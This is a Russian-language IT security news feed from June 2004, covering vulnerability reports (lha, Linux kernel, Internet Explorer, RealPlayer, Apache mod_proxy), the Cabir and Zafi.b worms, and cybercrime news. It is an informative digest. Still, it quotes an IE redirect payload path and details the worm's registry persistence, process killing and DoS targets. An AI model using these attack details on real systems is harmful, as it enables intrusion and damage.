Британская компания утверждает, что ей принадлежит ряд патентов, относящихся к процессу загрузки через интернет программного обеспечения и антивирусных обновлений. В понедельник British Technology Group (BTG) заявила, что она ведет переговоры с несколькими компаниями (в число которых, по некоторым сведениям, входит Microsoft) в расчете на то, что ей удастся заставить их платить роялти. «У нас есть патенты на разные способы загрузки обновлений программ через веб, включая обновления к антивирусным программам и другим программным продуктам. Эти патенты охватывают продукты, которые сегодня широко распространены», — сказал представитель BTG. BTG хочет получать как авансовые платежи, так и роялти от «ряда компаний», которые, как она утверждает, уже производят продукты, нарушающие ее патенты. Однако детали этих самых патентов пока не обнародуются. BTG, представляющая интересы инвесторов и владельцев патентов, желающих защитить свои патенты и заставить их работать, не говорит, с каким именно компаниями ведутся переговоры. Ее патенты могут затрагивать некоторые службы бесплатного обновления антивирусного ПО, существование которых, если им придется платить BTG, окажется под угрозой. Однако компания отрицает, что ее действия могут угрожать пользователям компьютеров. Как сообщает газета Daily Telegraph, в число компаний, преследуемых BTG, входит и Microsoft. Однако получить комментарии у представителей Microsoft пока не удалось.
Подробности

16/06/2004 10:17 Эксплоит уязвимости lha
Ранее сообщалось о наличии уязвимости в архиваторе Linux - lha, которая позволяла локально получить права суперпользователя. Командой разработчиков дистрибутива Debian была выпущена обновлёная версия lha, однако, как указывает Matt Zimmerman, приведённый ниже эксплоит всё равно позволяет получить суперпользователя даже с обновлённой версией lha. Написан на Перл поляком Lukasz Wojtow.
Эксплоит

16/06/2004 09:56 Компьютерная преступность: угрозы и прогнозы
Развитие научно-технического прогресса, связанное с внедрением современных информационных технологий, привело к появлению новых видов преступлений, таких как незаконное вмешательство в работу электронно-вычислительных машин, систем и компьютерных сетей, хищение, присвоение, вымогательство компьютерной информации. Это опасное социальное явление получило распространенное название - «компьютерная преступность» и «компьютерный терроризм». Вслед за прогрессом технологии идет и изменение структуры преступлений. По своему механизму, способам совершения и сокрытия компьютерные преступлений имеют определенную специфику, характеризуются высоким уровнем латентности и низким уровнем раскрываемости. Полный текст интервью директора Центра исследования компьютерной преступности Владимира Голубева Эдуарду Штайнеру (Eduard Steiner), московскому корреспонденту известной австрийской газеты «Der Standard», можно почитать, посетив ссылку, приведённую ниже.
Интервью

15/06/2004 19:44 Вирусы набрасываются на мобильные телефоны
"Лаборатория Касперского" сообщает об обнаружении первого сетевого червя "Cabir", имеющего функции распространения по сотовым сетям и заражения мобильных телефонов под управлением операционной системы Symbian OS. К счастью, на данный момент не зарегистрировано инцидентов, вызванных "Cabir". Предположительно червь был создан неизвестным под псевдонимом "Vallez", принадлежащим к международной группировке вирусописателей "29A", которая специализируется на создании концептуальных вредоносных программ. Ранее, эта группа "прославилась" авторством таких печально известных вирусов как "Cap" (первый макро-вирус, вызвавший глобальную эпидемию), "Stream" (первый вирус для дополнительных потоков NTFS), "Donut" (первый вирус для платформы .NET), "Rugrat" (первый вирус для платформы Win64). В ходе предварительного анализа кода вредоносной программы выяснилось, что "Cabir" доставляется на телефон в виде файла формата SIS (дистрибутив операционной системы Symbian), маскируясь под утилиту для защиты телефона Caribe Security Manager. При запуске зараженного файла червь выводит на экран надпись "Caribe", внедряется в систему и активизируется при каждой загрузке телефона. После этого "Cabir" сканирует доступные устройства, использующие технологию передачи данных Bluetooth, выбирает первый из них и пересылает ему свою копию. На данный момент каких-либо деструктивных функций в "Cabir" не обнаружено. Червь был создан специально для работы в Symbian OS для мобильных телефонов Nokia (например, серии 92x0). Однако, не исключено, что "Cabir" также работоспособен и в телефонах и мобильных устройствах других производителей.
Описание

15/06/2004 19:08 Появление червя I-Worm.Zafi.b.
"Лаборатория Касперского" сообщает об увеличении активности обнаруженного в прошлую пятницу, 11 июня, интернет-червя I-Worm.Zafi.b, распространяющегося в качестве вложений в зараженные электронные письма, а также через локальные и файлообменные сети. Червь написан на языке Assembler, упакован при помощи FSG и имеет размер 12800 байт. В распакованном виде размер увеличивается до 33292 байт. Червь распространяется в качестве вложений в зараженные электронные письма. Для поиска адресов, по которым будет производиться рассылка зараженных писем, червь сканирует файлы с расширениями: adb, asp, dbx, eml, htm, mbx, php, pmr, sht, tbb, txt, wab. На адреса, содержащие подстроки: admi, cafee, google, help, hotm, info, kasper, micro, msn, panda, sopho, suppor, syma, trend, use, vir, webm, win, yaho - отправка писем не осуществляется. Содержание зараженного письма выбирается в соответствии с именем домена адреса получателя. Распространяется также через локальные и файлообменные сети. Червь копирует свой файл во все папки, в имени которых встречаются строки: share, upload. Имя для файлов червя выбирается из следующего списка: Total Commander 7.0 full_install.exe, winamp 7.0 full_install.exe. После запуска копирует свой файл в системный каталог Windows. Имя файла генерируется случайным образом. Червь регистрирует себя в ключе автозагрузки системного реестра: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "_Hazafibb"="%system%\[имя файла]". Также червь создает уникальный идентификатор "_Hazafibb" для определения своего присутствия в системе. Прекращает работу в памяти следующих процессов: fvprotect.exe, jammer2nd.exe, services.exe, winlogon.exe. После остановки данных процессов, удаляет их файлы с диска. Создает в корне диска C: файл "sys.txt". Пытается обнаружить на компьютеры файлы некоторых антивирусных программ и перезаписывает их содержимое своими копиями. Пытается произвести DoS-атаку на сайты: www.2f.hu, www.parlament.hu, www.virusbuster.hu, www.virushirado.hu.
Источник

15/06/2004 18:01 Отчет ФБР о состоянии компьютерной преступности в 2004 году
Отчет по компьютерной преступности, опубликованный ФБР за 2004 год, свидетельствует: финансовые потери 494 опрошенных компаний в 2004 году составили $141 496 560, что значительно меньше, чем в прошлом году – 530 респондентов показали убытки от компьютерных инцидентов $201 797 340. Количество «успешных» атак на компьютерные системы, начиная с 2001 года снижается. В этом году процент опрошенных, ответивших, что их компании пострадали от несанкционированного доступа к компьютерным системам составил 53%, что является самым низким показателем, начиная с 1999. Более того, процент респондентов, ответивших, что их компании не столкнулись с проблемой несанкционированного доступа к системам увеличился до 35%, в то время как 11% не знают, подвергались ли они несанкционированному доступу или нет, что так же является наименьшим показателем с 1999 года. Общие потери в 2004 году среди опрошенных 269 респондентов составили 141 496 560 $, что меньше чем 201 797 340 $ в 2003. Как видно, самым «дорогим» видом компьютерных преступлений остаются DoS атаки – $26 064 050. Второе место занимает кража корпоративной информации (промышленный шпионаж) - $11 460 000, мошенничество с финансовыми ресурсами занимает 5 место – $7 670 500, на седьмом месте – несанкционированный доступ - $4 278 205, проникновение в систему – на 11 месте – $901 500.
crime-research.ru

14/06/2004 15:04 Уязвимость в NetBSD
Евгений Демидов сообщает об обнаружении уязвимости в ОС NetBSD. Уязвимость присутствует в механизме обработки целых чисел (integer handling error) внутри системного вызова swapctl(). Уязвимость не может быть использована для повышения привилегий, а всего лишь привести (локально) к краху системы (DoS). Патч доступен в CVS-репозитарии.
Подробности

14/06/2004 14:18 Результаты исследования Вэб-серверов от Netcraft
В противовес предыдущему исследованию, приводим аналогичное исследование, которое каждый месяц выполняется компанией Netcraft. Различия в месяце - Netcraft приводит исследование за июнь (что, впрочем, не меняет сути дела), в количестве исследованных хостов - у Netcraft фигурируют 51,635,284 сайтов (на 1 миллион больше, чем в мае). Это уже 17 отчёт, составленный Netcraft - c февраля 2003 г. В отчёте фигурирует бОльшее количество Вэб-серверов (например, на Бог знает каком месте Вэб-сервер TNhttpd). Cогласно итоговому отчёту на первом месте опять же значится Apache - 67.22%, на втором - IIS - 21.34%, на третьем Enterprise от Netscape - 3.20%. Также отмечается, что 49.13% cерверов расположены в зоне .com, 6.27% в - .uk.
Отчёт

14/06/2004 13:55 Результаты исследования Вэб-серверов в Интернет за май
Каждый месяц компания Security Space публикует результаты своего ежемесячного исследования ПО Вэб-серверов в Интернете. Тяжело сказать, насколько они близки на самом деле к истине (хидеры ответа Вэб-сервера, имея знания, довольно легко подделать), но они имеют место быть. Итак, в течение мая были исследованы 14.8 миллионов Вэб-серверов (вернее, их ответы на HTTP-запрос), что на 300 тыс. больше апреля. Согласно отчёту, большинство Вэб-серверов созданы на базе Apache - 70.76% (на 0.23% больше, чем в апреле), на втором месте постепенно сдающий позиции IIS от сами_знаете_кого - 22.26% (на 0.14% меньше, чем в апреле), на третьем Вэб-сервер от Netscape - 0.89%. Если рассматривать конкретные версии Вэб-серверов, то на первом месте значится IIS/5.0 - 16.39%, на втором лишь на 0.03% уступивший ему Apache/1.3.27 - 16.36%, на третьем - Apache/1.3.29 - 15.61%. Также подведены итоги распространённости Вэб-серверов по доменам .com, .org, .net, .de, .uk, .edu. На самом деле, как говорилось выше, не стоит очень серьёщзно относиться к результатам исследования, однако общие тенденции в нём наверняка прослеживаются.
Результаты

14/06/2004 11:33 Возвращение ADinf32
Компания "ДиалогНаука" сообщает о выходе в свет новой версии 3.02 ревизора дисков ADinf32, которая обеспечивает полную поддержку операционной системы Windows XP. Таким образом, теперь ревизор дисков ADinf работает в средах Windows NT/2000/XP, Windows 95/98/Me, Windows 3.1x и MS DOS. Программы семейства ADinf предназначены для того, чтобы следить за сохранностью информации на дисках и обнаруживать практически любые изменения в файловой системе, а именно: изменения системных областей; создание и удаление каталогов; создание, изменение и удаление файлов; переименование файлов и их перемещение из каталога в каталог. Список отслеживаемых параметров может быть настроен самим пользователем, что позволяет контролировать только необходимые изменения. Ревизоры дисков отслеживают, в том числе, и те изменения на диске, которые связаны с вторжением в систему вирусов, троянских и других вредоносных программ. Кроме того, ревизор диска не использует функций ОС и самостоятельно разбирает структуру файловых систем FAT и NTFS, что не позволяет маскирующимся вирусам обмануть его. ADinf можно интегрировать с разными антивирусными программами-сканерами. В этом случае ревизор ADinf после полной проверки жестких дисков компьютера формирует список имен новых и изменившихся файлов и запускает антивирусный сканер для проверки именно этих файлов. Таким образом, проверка жестких дисков сканером сводится к проверке небольшого числа файлов, которые имеет смысл проверять.
CNews

14/06/2004 10:49 В десятке суперкомпьютеров будет и китайский
Быстрый рост китайской экономики в последнее время стал уже свершившимся фактом и уже никого не удивляет. Тем более достоин внимания факт, на который просто невозможно было не обратить внимание. По сообщению гонгконгского сайта ComputerWorld, в китайской Академии наук собирают мощный суперкомпьютер, скорость работы которого, по результатам предварительных тестов, будет не менее 10 терафлоп. Таким образом, в десятку мощнейших суперкомпьютеров мира впервые в истории попадёт китайский компьютер, представляющий собой кластер из 2560 процессоров AMD Opteron частотой 800 МГц, собранных в 640 узлов по четыре процессора. Кстати, AMD объявила об сборке этого компьютера в прошлом году, ещё до начала работ.
Подробности

14/06/2004 10:22 Как защитить клавиатуру от взлома
ООО "Центр информационной безопасности", украинская компания-разработчик программных средств защиты информации, сообщает о выпуске версии 3.5 программного продукта PrivacyKeyboard, cообщает Internet.Ru. Программный продукт PrivacyKeyboard предназначен для защиты информации, обрабатываемой на ПК, от несанкционированно установленных программных продуктов, осуществляющих мониторинг действий пользователя на ПК с использованием функций перехвата нажатий клавиш на клавиатуре (кейлоггеров), текста из окон и графических снимков экрана. PrivacyKeyboard противодействует и работе аппаратных устройств, перехватывающих нажатия клавиш на клавиатуре. Особенностью PrivacyKeyboard является использование не сигнатурных баз, а интеллектуальных алгоритмов. Они основаны на общих принципах, присущих всем типам мониторинговых программ, работающих на персональных компьютерах под управлением операционных систем Microsoft Windows NT/2000/XP. PrivacyKeyboard постоянно работает в фоновом режиме "прозрачно" для пользователя и обеспечивает защиту системы в реальном режиме времени. Программа, обеспечивая защиту от различных типов кейлоггеров (включая кейлоггеры в виде драйвера уровня ядра системы), сама работает на низком системном уровне ядра. Если "умный" пользователь попробует удалить ее вручную, у него ничего не получится, т.к. наиболее важные компоненты программы (файлы и записи в реестре) скрыты, и программа имеет механизм контроля целостности. Одна лицензия стоит почти 60 "американских рублей".
О продукте

14/06/2004 09:37 15 лет процессору Intel 486!
В этом году исполнилось 15 лет процессору Intel 486! В апреле 1989 г. компания Intel сообщила о выпуске процессора Intel 486DX, работу над которым велись с 1980 г. Он был также, как и предшественник i386 32-битным, однако, в отличие от 386 показывал быстродействие 20 MIPS (million instructions per second) при тактовой частоте 33МГц. При этом впервые в этом процессоре сопроцессор (предназначен для выполнения операций с плавающей точкой) был интегрирован на чипе и к тому же сам чип содержал встроенный кэш на 8 КБ. Кроме того, в этом процессоре впервые была реализована система конвейеров (pipelining), которая до этого применялась только на мейнфреймах. Это позволило впервые реализовать (теоретически) возможность выполнения одной инстркуции за один цикл встроенный часов (т.н. "тики"). Также 486-й чип был первым. который позволял ангрейдить (обновлять) процессор, благодаря представленной тогда Intel технологии "OverDrive" (естественно, при поддержке её материнской платой). В дальнейшем появлялись модификации проссора - в 1991 - 486SX (бюджетная версия без сопроцессора), 486DX/50 (работал на частоте 50MHz). В 1992 г. были выпущены i486DX2/50 и i486DX2/66, которые работали на частоте, вдвое большей частоты шины (25MHz в первом случае, 33 - во втором). Также в 1992 г. был выпущен 486SL, имеющий 1.4 млн. транзисторов на борту (против 1.2 в DX). Крайней версией в ветви 486 был, выпущенный в 1994 г. DX4/100. Несмотря на то, что, казалось бы - это должно означать учетверённую частоту, однако процессор, работающий на 33MHz шине имел утроенную частоту работы, что составляло 100MHz. Интересно отметить, что вместе с выпуском 486 процессора был выпущен RISC процессор i860 и Intel долго колебалась - на какой же из них сделать ставку. История расставила всё по своим местам. :) Тем не менее, i860, например. тоже нашёл свою нишу (хотя и не столь массовую) - он применяется, например, в RAID-контроллерах. В частности, у автора этих строк он стоял в RAID-контроллере AMI MegaRAID (сейчас - AMI MegaRAID Express 500 с процессором i960RM - 100MHz RISC).;)
Geek.com
История i486

13/06/2004 20:09 Уязвимость в ядрах Linux
Обнаружена уязвимость в ядрах 2.4.х, 2.6.х ОС Linux (в 2.2.х её нет). Ошибка кроется в функции math_error() файла arch/i386/traps.c. Проблема активно обсуждается в форуме разработчиков ядра LKLM. Выпущена небольшая программка из 20 строчек, при помощи которой можно намертво завесить систему. Официальных патчей от производителей пока нет, но существуют частные патчи разработчиков ядра. эксплоит вызывает FPU exception в функции обрабочика сигналов. Уязвимость присутствует только на платформе x86.
Подробности

13/06/2004 19:03 Выполнение произвольного кода в Microsoft Internet Explorer
Обнаружена уязвимость в Microsoft Internet Explorer, позволяющая удаленному атакующему выполнить произвольный код на уязвимой системе. Уязвимость существует при обработке HTTP перенаправлений. Злоумышленник может сконструировать специальную HTML страницу, при обращении к которой выполняется произвольный код в контексте локальной зоны безопасности. Вэб-сервер может послать ответ HTTP 302 и загрузить локальный файл в iframe с заголовком Location: URL: ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm.
SecurityLab.ru

13/06/2004 18:35 Ещё одна уязвимость в RealPlayer
В продолжение предыдущей новости. Не менее известная английская компания NGSSoftware сообщила о существовании уязвимости в RealPlayer, которая позволяет удалённому атакующему сформировать специальный .RA, .RM, .RV или .RMJ файл, при попытке воспроизведения которого произойдёт переполнение буфера с последующим выполнением произвольного кода в конексте пользователя, от имени которого был запущен файл. Решение проблемы - то же самое - обновление RealPlayer с сайта производителя. NGSSoftware сообщает также о существовании эксплоита, выпущенного этой компанией для проверки уязвимости.
NISR11062004

12/06/2004 19:18 Уязвимость в RealPlayer
Известная секьюрити компания eEye Digital Security сообщает о наличии уязвимости в популярном медиа-плеере RealPlayer. Согласно этомй сообщению, из-за ошибки в библиотеке embd3260.dll злоумышленник может создать некорректный муви-файл и, внедрив его потом в HTML-файл или страницу, передать (либо вынудив зайти на сайт) его жертве. При этом, при формировании сообщения об ошибке (код которой формируется в библиотеке) возникает переполнение буфера в куче, с возможностью выполнения произвольного кода в системе c привилегиями пользователя, запустившего RealPlayer. Уязвимости подвержены версии: RealOne Player, RealOne Player v2, RealPlayer 8, 10, Enterprise. Real.com выпущено обновление, закрывающее уязвимость. Для обновления необходимо в меню "Tools" пункт "Check for Update".
Подробности

12/06/2004 18:50 Базы под ударом
Компания Oracle признала возможность SQL-инъекции в своем продукте Oracle E-Business Suite. С помощью специально подготовленного URL удаленный пользователь может исполнить на сервере базы данных любое SQL-выражение или функцию. Причем возможных мест применения подобных нападений несколько. Oracle выпустила исправление, устраняющее данный дефект, а поскольку риск нападения достаточно большой, то рекомендует всем пользователям Oracle Applications обновить используемое ПО. Другой дефект был найден в ODBC-драйвере для базы данных PostgreSQL, разработанный в группе создателей Apache. В модуле misc.c в функции make_string() было обнаружено переполнение буфера, которое удаленный пользователь может использовать для нападения на информационную систему.
OSP.RU

12/06/2004 18:32 Бета-версия виртуальной машины SVISTA
Компания Serenity Systems International (SSI) объявляет о начале открытого (публичного) бета-тестирования программы Serenity Virtual Station (SVISTA) - виртуальной машины для персональных компьютеров на базе Intel. Доступны версии SVISTA для eComStation, Linux и Microsoft Windows (версия для FreeBSD выйдет позже в этом году). SVISTA позволяет выполнять различные операционные системы (или несколько копий одной системы) в виде гостевых рабочих столов внутри виртульной машины. Т.е. пользователь получает одновременный доступ к нескольким рабочим столам, работая за одним компьютером. Хотя программа бета-тестирования направлена на индивидуальных пользователей, SSI также помогает проводить программы оценки для коммерческих отделов предприятий и деловых партнеров.
Cайт проекта

12/06/2004 17:15 Саммит "большой восьмерки" поддерживает новая полусекретная сеть
Проходящая в США встреча лидеров стран-членов "большой восьмерки" явится крупнейшей проверкой национальной информационной сети обеспечения внутренней безопасности (Homeland Security Information Network, HSIN). HSIN является ключевым элементом системы сбора, обработки и распределения значимой с точки зрения госбезопасности, но не секретной информации. В эти дни, когда на курортном острове Си-Айленд в Джорджии президент Буш принимает руководителей наиболее влиятельных государств мира, сеть HSIN проходит всесторонние испытания "в деле". С ее помощью обеспечивается взаимодействие и двусторонний обмен информацией между федеральными агентствами, местными структурами министерства национальной безопасности и более чем 20 тысячами сотрудников полиции и служб безопасности, стерегущих покой на самом острове и на подступах к нему. О существовании сети HSIN Министерство внутренней безопасности США сообщило четыре месяца назад. HSIN представляет собой структуру из взаимодействующих между собой порталов и систем документооборота, таких, как порталы Workspace компании Groove Networks или SharePoint от Microsoft. «Новая сеть стала поистине всепроникающим средством оповещения об угрозе по всей стране, - комментирует ведущий технолог министерства внутренней безопасности Ли Холком (Lee Holcomb). - HSIN позволяет федеральным агентствам напрямую взаимодействовать с аналогичными структурами на уровне штатов и местных органов власти». На сегодняшний день в сети функционирует семьдесят узлов, к середине лета добавится еще тридцать. В сети реализованы, в частности, технологии портала Workspace, обеспечивающие защищенную передачу данных с использованием усовершенствованного 192-битного алгоритма шифрования, и пользовательская авторизация с использованием "открытого ключа". Охрана (в том числе информационная) работы лидеров "восьмерки" - не пустая формальность: в Брунсвике, в шести милях от Си-Айленда, и в Саванне, расположенной в восьмидесяти милях, бескомпромиссные антиглобалисты группируют свои силы. Службы безопасности призваны не допустить погромов и разрушений, которыми ознаменовались форум Всемирной торговой организации в Сиэтле в 1999 году и саммит "восьмерки" в Генуе в 2001-м. Ситуация осложняется тем, что именно в Саванне размещен пресс-центр саммита. Правда, остров Си-Айленд защищен самой природой: доехать до него можно лишь по дамбе длиной более десяти километров.
CNews.Ru

12/06/2004 16:59 ISS помогает организациям бороться с нецелевым использованием Internet сотрудниками
Компания Internet Security Systems, Inc. (ISS) анонсировала новую услугу - предотвращение использования Интернета в личных целях сотрудниками компаний в рабочее время. Основным видом злоупотребления, против которого направлена эта услуга, является несанкционированный поиск сотрудниками новой работы. Продуктивность работников значительно снижается также за счет онлайнового шопинга, "сидения" в чатах, загрузки игр и музыки, но поиск работы через Интернет, по данным исследования, проведенного компанией ISS, наносит бизнесу наибольший вред. Даже в США удовлетворенность людей своей работой резко падает. По данным консалтинговой фирмы Watson Wyatt, лишь 49% граждан довольны своей работой, хотя в 1995 году этот показатель достигал почти 60%. Высокоскоростной Интернет пришел сейчас почти на каждое рабочее место, а количество сайтов для поиска вакансий растет очень быстро - на 25% в год, и множество людей тратит колоссальные ресурсы на поиск более выгодного трудоустройства, фактически воруя Интернет-трафик у своих работодателей. С этой проблемой напрямую связана и опасность потери конфиденциальных данных. Организация World Privacy Forum исследовала 70% сайтов для поиска работы и установила, что большинство из них запрашивают у посетителей важную личную информацию. Собранные таким образом данные о пользователях впоследствии используются без их санкции.
Подробности о проекте

12/06/2004 16:31 Инсталляция и конфигурация загрузчика GRUB
На сайте opennet.ru опубликована довольно полезная статья Владислава Лазаренко, посвящённая инсталляции и конфигурации загрузчика GRUB (GRand Unified Bootloader, разработанный Erich Stefan Boleyn), который постепенно вытесняет традиционный и заслуженный (и, надо признать, намного более удобный и простой) загрузчик LILO. Статья представляет собой перевод руководства, написанного Jaswinder Singh Kohli. Наверняка будет представлять интерес для начинающих (а может и не очень) системных администраторов, да и для пользователей десктоп-систем Linux тоже. Имеется также PDF-версия документа.
http://www.opennet.ru/base/sys/grub_info.txt.html

12/06/2004 16:07 Поставщики антивирусов ждут Linux-эпидемии
Хотя антивирусное программное обеспечение для Linux давно существует, производители ждут серьезной атаки перед тем, как продвинуть свои товары. Многие разработали антивирусное ПО для UNIX, но только теперь переносят его на Linux в целях устранения потенциальных угроз, опасных для компаний, работающих одновременно с Windows и открытым программным обеспечением. «Linux по своей сути более безопасна по сравнению с Microsoft, а последняя еще и значительнее подвержена атакам», — заметил Roger Levenhagan, управляющий директор Trend Micro UK. «Но вся мощь антивирусной индустрии не придет в действие, пока Linux не пострадает от вируса, после чего потребителям она [антивирусная индустрия] понадобится»… Червь ADM стал первым направленным именно против Linux-пользователей и появился в 1998 году. Symantec сообщает, что обнаружила три Linux-вируса с начала 2004 года. John Thompson, глава Symantec, подтвердил информацию о том, что его компания «выпустит на рынок антивирусное решение для desktop Linux» в этом году, но не сообщил о точных временных рамках по разработке.
nixp.ru

12/06/2004 15:41 Microsoft выпустила пакет для работы с векторной графикой
Microsoft предложила свою альтернативу таким программам для работы с векторной графики, как Corel Draw и Adobe Illustrator, cообщает "Компьюлента". Отныне клиенты софтверного гиганта могут совершенно бесплатно воспользоваться программой Microsoft Expression 3. Ранее Expression принадлежала компании Creature House technology, однако после ее поглощения в прошлом году корпорацией Microsoft, стала выходить под маркой редмондской компании. Новых возможностей в Expression 3 по сравнению с предыдущими версиями достаточно много. Появились функция наложения отражения в реальном времени (Real-time Reflection Mapping), подтяжка изображений ластиком, поддержка модифицируемых форм с возможностью управлять сложными векторами. Кроме того, функция Dazzling Effect Lines позволит создателям комиксов с легкостью делать сложные штриховки. Например, используя Effect Lines, можно легко нарисовать из серии штрихов изогнутые линии (см. рисунок). Еще одним плюсом является совместимость Expression с форматами AI, EMF, WMF, EPS, PDF и Flash.
URL загрузки (56 мегабайт)

12/06/2004 15:36 В Москве ограблен и частично разрушен Савеловский компьютерный рынок
В ночь на 12 июня в Москве совершен налет на одно из торговых зданий Савеловского рынка. Около 1:30 более 10 человек в форме спецназа и черных масках ворвались в двухэтажный павильон, где продавались компьютеры и оргтехника. Четверо охранников были выведены из здания, посажены в автомобиль и доставлены в ОВД Марьина роща. Там охранников встретили другие люди, обвинившие их в краже мобильного телефона, после чего те были задержаны милицией. Тем временем из здания на двух КАМАЗах были вывезены товары - компьютеры и оргтехника, принадлежавшие нескольким десяткам фирм, арендовавших торговые площади. По оценке представителей "Гревилеи", стоимость похищенного может составлять несколько сотен тысяч долларов. Через некоторое время после того, как налетчики покинули здание, к нему прибыл бульдозер и начал разрушать постройку. Прежде чем его остановили прибывшие на место руководитель частного охранного предприятия, он успел частично снести павильон. По словам бульдозериста, он действовал в соответствии с договором, заключенным с некоей компанией и не подозревал о незаконности своих действий. Представители "Гревилеи", обратившейся в милицию по поводу ограбления, заявили, что действия правоохранительных органов кажутся им странными. По их словам, милиционеры побывав на месте происшествия рано утром в настоящее время не ведут там никаких следственных действий. Вопросы у владельца здания также вызывает целесообразность задержания на всю ночь охранников. В то же время начальник ОВД Марьина роща подполковник Глущенко заявил корреспонденту Ленты.Ру, что никакого задержания охранников здания ночью не производилось. По его словам, милиция прибыла на место происшествия по заявлению владельцев здания еще 4:00. Тем временем к разрушенному зданию прибыли спасатели МЧС, которые приступили к обследованию завалов с собаками, чтобы удостовериться, что под обломками нет людей.
Lenta.ru

11/06/2004 14:48 ФБР арестовало похитителей кодов Half Life 2
ФБР арестовало в нескольких странах злоумышленников, подозреваемых в причастности к воровству исходных кодов продолжения популярной игры Half Life, cообщает lenta.ru. Детали задержания и имена пока не обнародованы, поскольку расследование дела продолжается, сообщает агентство Reuters. Хакеры похитили коды, взломав компьютерные системы разработчика игры фирмы Valve. Пропажа кодов задержала выпуск игры, который был намечен на конец 2003 года. В свое время представители Valve обратились ко всем поклонникам игры с просьбой помочь найти похитителей. "Было очень удивительно наблюдать за тем, как быстро и находчиво игроки Half Life распутали то, что обычно представляется неразрешимой задачей для правоохранительных органов", - заявил в этой связи руководитель Valve Гейб Ньюэл (Gabe Newell). По первым результатам расследования был произведен арест программиста из Сан-Франциско Криса Тошока (Chris Toshok), который полностью отрицал свою вину. Однако он признал, что поддерживал контакты с группой хакеров, известных как "Голодные программисты" (Hungry Programmers), которые вполне могли совершить кражу кодов.
Подробности

11/06/2004 11:17 Спаммеров ожидает кровавая баня
Появившийся в продаже программный пакет компании Symbiot можно использовать не только для защиты от хакерских атака, но и для нанесения контрударов. Компания Symbiot называет свой пакет iSIMS первой в мире «платформой для создания адаптивной системы безопасности» корпоративной локальной сети. Если традиционный брандмауэр можно использовать только в качестве щита, уходя в случае массированной атаки в глухую оборону, то iSIMS – это пакет «двойного применения». Оценив опасность атаки, а также возможный ущерб в случае ее продолжения, iSIMS, как заявляет разработчик, может либо проигнорировать нападающего, закрыв определенный порт, либо, в самом крайнем случае, вырубить нападающий компьютер. Впрочем, на этом список возможностей программы не исчерпывается. Среди инструментов, предлагаемых сетевому администратору, можно выделить такие, как: возможность блокирования трафика с определенного IP-адреса, ограничение пропускной способности сети для определенных отправителей, а также перенаправление подозрительного трафика на сервера-болванки, используемые для отвлечения внимания противника. В случае если этот набор мер не помогает, изготовители предлагают другой, более агрессивный набор инструментов. Например, особо назойливый хакер, пытающийся пробраться в закрытую сеть, рискует получить не файл с паролями, а файл-метку, благодаря чему атакующая машина будет светиться в сети как «известный агрессор». Если дело дойдет до серьезной атаки, iSIMS, как уже говорилось, может просто «завалить» машину нападающего. Стоимость этого счастья составляет 10 тысяч долларов в месяц (киллеров не дешевле заказать? - прим.ньюсмейкера).
Internet.Ru

11/06/2004 11:04 «Лавры» Максима Ковальчука не дают покоя украинским хакерам
Работники правоохранительных органов города Тернополя задержали хакера, который проникал в компьютерную сеть одного из местных банков и переводил на свои счета деньги. Задержанный ранее работал в этом же банке программистом, и, по отзывам, был опытным специалистом, однако недисциплинированным, за что и был уволен. Хорошо зная компьютерную сеть банка, в котором раньше трудился, уволенный решил наказать своих работодателей, а, заодно и пополнить свой собственный банковский счет. Мошенник проник в компьютерную сеть банка и стал перебрасывать деньги с банковского счета на свои кредитные карточки. Он оперировал сравнительно небольшими суммами, рассчитывая, что такие пропажи останутся незамеченными. Однако тернопольские правоохранители вышли на его след и при последнем переводе 13 тысяч гривен, мошенник был задержан. По сообщению центра общественных связей УВД г.Тернополя, пока в документах фигурирует сумма в 30 тысяч гривен (около 180 тыс. рублей), похищенных хакером. И еще один весьма любопытный факт. Как пишет корреспондент «Комсомольской правды в Украине» Ярослав Коляса, задержанный в свое время дружил с Максимом Ковальчуком, которого ФБР зачислило в десятку самых опасных компьютерных преступников мира.
Crime-research.ru

11/06/2004 10:43 Уязвимость модуля в Apache.
Известный исследователь компьютерной безопасности Georgi Guninski обнаружил уязвимость в одном из модулей популярного Вэб-сервера Apache. Уязвимость присутствует в модуле mod_proxy, в котором некорректно некорректно проверяются границы (boundary) передаваемых данных. Передав при помощи "Content-Length:" заголовок с большим значением негативных значений, можно вызвать переполнение буфера в куче, что может привести как к типичному DoS, так и теоретически к получению системных полномочий на некоторых BSD-системах. Подключение модуля позволяет использовать Вэб-сервер Apache в качестве прокси-сервера, что применяется далеко не всегда (к счастью). Уязвимости подвержены версии 1.3.31, 1.3.29, 1.3.28, 1.3.27, 1.3.26. Устранена в девелоперской версии 1.3.32-dev. Естественно, избежать уязвимости также можно, отключив модуль в файле конфигурации
Описание

11/06/2004 10:21 Советы по увеличению производительности Mac OS X
В статье "10 Things Apple Did To Make Mac OS X Faster" затрагивается тема тюнинга производительности ядра Mac OS X. Интересно то, что несмотря на использование в Darwin FreeBSD кода, что-нибудь близкое другим BSD-системам в статье уловить трудно, сообщает opennet.ru.
Статья

11/06/2004 09:47 Bluetooth стал в три раза быстрее
Компания CSR приступила к выпуску модулей Bluetooth четвертого поколения, специально разработанных для расширенной передачи данных в формате Enhanced Data Rate (EDR). Новый модуль BlueCore4 обеспечивает скорость передачи данных, в 3 раза превышающую скорость сегодняшних устройств Bluetooth модификации v1.2, а также отличается пониженным уровнем энергопотребления, что актуально при установке модуля в мобильные устройства. Стандарт передачи данных Bluetooth EDR обеспечивает максимальную скорость передачи данных в 2,1 Мбит/с по сравнению с 721 Кбит для модулей стандарта v1.2. Увеличение скорости означает, что для передачи одинакового объема информации новому модулю понадобится меньше времени, а значит и время непрерывной радиопередачи уменьшается, что обеспечивает увеличение времени работы аккумулятора. BlueCore4 полностью совместим с существующими стандартами Bluetooth - v1.1 и v1.2. Увеличение скорости передачи данных обеспечивается с помощью схемы модуляции с фазовым сдвигом (Phase Shift Keying, PSK), которая применена вместо использовавшейся ранее схемы гауссовской частотной модуляции (Gaussian Frequency Shift Keying, GFSK). Новая технология позволяет передавать большее количество бит в каждом символе пакета, отправленного по радиоканалу. Тем не менее, скорость передачи символов осталась прежней - 1 мегасимвол в секунду, тайминг и структура пакета также остались прежними, спектральные параметры радиопередачи не изменились. СSR BlueCore4 будет поставляться на рынок в двух вариантах: один с возможностью использования внешней флэш-памяти, другой - с масочным ПЗУ. BlueCore4-External будет поставляться в корпусе BGA размером 8х8 мм, что является чрезвычайно гибким технологическим решением и дает широкие возможности улучшения базового устройства. Модуль будет очень эффективен при работе с ПО и 